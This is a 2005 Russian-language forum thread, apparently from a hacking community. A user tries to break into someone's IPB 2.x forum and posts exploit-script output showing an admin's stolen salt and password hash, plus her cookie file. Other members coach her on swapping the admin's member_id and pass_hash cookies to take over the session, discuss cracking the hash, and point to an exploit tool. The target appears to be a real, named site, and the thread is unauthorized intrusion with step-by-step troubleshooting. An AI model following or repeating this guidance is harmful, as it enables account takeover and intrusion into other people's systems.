помогите разобраться в ipb 2.x ???

помогите разобраться в ipb 2.x ???

21.11.2005, 17:28

Юличка

Новичок

Регистрация: 13.06.2004

Сообщений: 9

С нами: 11530515

Репутация: 1

помогите разобраться в ipb 2.x ???

Народ как-то решила взломать форум... Версия форума не указана поняла по внешности что это ipb 2 ... Дальше по примерчику:

C:\>ipb2.pl [тут адрес форума] /forum/ 6
[~] SERVER : [тут адрес форума]
[~] PATH : /forum/
[~] MEMBER ID : 6
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]

SALT : 8275753649

[~] SEARCHING THE PASS HASH |32][ DONE ]

PASS HASH : 98564855539910110251564957545053102565010054565752 49504898491025152102

кажится все нормуль но не может же быть такая соль??? и сам хешь... =( Вообщем дальше как по инструкции делаю словарь с солью потом подбираю пароль но не находит=( Хотя я точно знаю какой пароль в словаре он есть... из-за чего это?

Так же воспользовалась другим примерчиком нашла куки админа

C:\>2.pl [тут адрес форума] /forum/ 6 1
[~] SERVER : [тут адрес форума]
[~] PATH : /forum/
[~] MEMBER ID : 6
[~] TARGET : 0 - IPB 2.*
[~] SEARCHING PASSWORD ... [ DONE ]

MEMBER ID : 6
PASSWORD : 23c1674c36fdca629ef6d91b155e5614

но почему то при замене не хочет входить под ником админа!? если другого пользователя куки вставляю то входит нормально а под админом не хочет входить из-за чего???

𝕏 Twitter Reddit Telegram Копировать ссылку

21.11.2005, 18:19

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

С нами: 10798886

Репутация: 523

первый сплойт пример которого ты привела с ошибкой.
а со вторым... если всё правильно заменяешь, и id и hash то должна под админом войти, но в админку так не попасть

21.11.2005, 18:46

Юличка

Новичок

Регистрация: 13.06.2004

Сообщений: 9

С нами: 11530515

Репутация: 1

а есть первый сплойт без ошибки!?

А теперь на счет кук... Вот например возьмем куки форума в котором я должна поменять id и hash - юля@www.ser.ru[2]

содержимого этого файла:

member_id
5771 [ - это мой id]
www.ser.ru/
1536
1119480320
29822330
3360966416
29748904
*
pass_hash
c6c6b5495cc11cf46b9c44accbb6c721 [ - это мой hush]
www.ser.ru/
1536
1119480320
29822330
3360966416
29748904
*
мне надо поменять id (вместо 5771 на 6)
и
hush ( c6c6b5495cc11cf46b9c44accbb6c721 на 23c1674c36fdca629ef6d91b155e5614)

получаю:

member_id
6
www.sergeylazarev.ru/
1536
1119480320
29822330
3360966416
29748904
*
pass_hash
23c1674c36fdca629ef6d91b155e5614
www.sergeylazarev.ru/
1536
1119480320
29822330
3360966416
29748904
*

правильно сделала??? захожу снова на форум но почему то куки старые грузятся или вообще не входит типа не зарегина я.... правда у меня Explorer может другой брауз нужно??? да мне админка не очень нужна просто хочу этот способ до конца разобрать...

P.S. Может есть еще способы взлома ipb 2.x ???

21.11.2005, 18:56

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

С нами: 10798886

Репутация: 523

Если в админку тебе не надо, а просто помодерировать хочешь-))))) Короче забей на эту фигню, как ты меняешь! Так конечно тоже можно, но лучше установи себе браузер Opera там зайди в Tools => Cookies там выберишь сайт на котором куки надо поменять и сразу увидишь разницу насколько так всё легче! Там просто уже не запутаешься...
Зайдёшь под своим ником потом отредактируешь куки перезагрузишь страницу и ты под админом, если его куки... вот. А вообще вроде и так всё верно.

22.11.2005, 20:35

W.W.

Новичок

Регистрация: 21.11.2005

Сообщений: 9

С нами: 10773558

Репутация: 1

В Опере намного удобнее куки редактировать. Регистрируешься на форуме (если ты там ещё не зарегена), затем правишь параметры member_id и pass_hash на полученные эксплойтом. обновляешь страницу форума и всё...

Только для доступа в Админку тебе надо пасс по-любому, расшифровывай pass_hash с помощью MD5inside или отправляй на спецсервак по расшифровке пассов из хешей.

Последний раз редактировалось W.W.; 22.11.2005 в 20:39..

22.11.2005, 20:43

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

С нами: 10798886

Репутация: 523

W. W. она ломает форум IPB 2.* а там хэш так просто не расшифруешь! Поэтому MD5inside отпадает сразу. Ну только, если она соль не знает.....

22.11.2005, 22:50

W.W.

Новичок

Регистрация: 21.11.2005

Сообщений: 9

С нами: 10773558

Репутация: 1

Ой, да... ну прямой подбор отпадает.

Хотя бы помодерить так можно :Р

24.11.2005, 13:38

Netch

Новичок

Регистрация: 09.08.2005

Сообщений: 17

С нами: 10923152

Репутация: 0

Есть эксплойт специально под 2.* версию который тащит соль и хэш. Видео на счет этой баги есть в разделе video.antichat.net . Там с видео и удобная прожка идет.

24.11.2005, 13:43

Barsik

Постоянный

Регистрация: 16.01.2005

Сообщений: 300

С нами: 11217926

Репутация: 726

Отправить сообщение для Barsik с помощью MSN

Цитата:

Сообщение от Netch

http://video.antichat.net/videos/coyl/ipb2.rar
Если я не ошибаюсь

#10

24.11.2005, 14:13

m0nzt3r

ветеран

Регистрация: 22.06.2004

Сообщений: 2,128

С нами: 11517446

Репутация: 2258

Юличка лазарева сайт решила поломать?)))
а ваще ребята правы юзай Оперу может быть у тя глюки из за ИЕ..
Барсик да сцылка та)

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

Создать сделку

Мои сделки

Сделка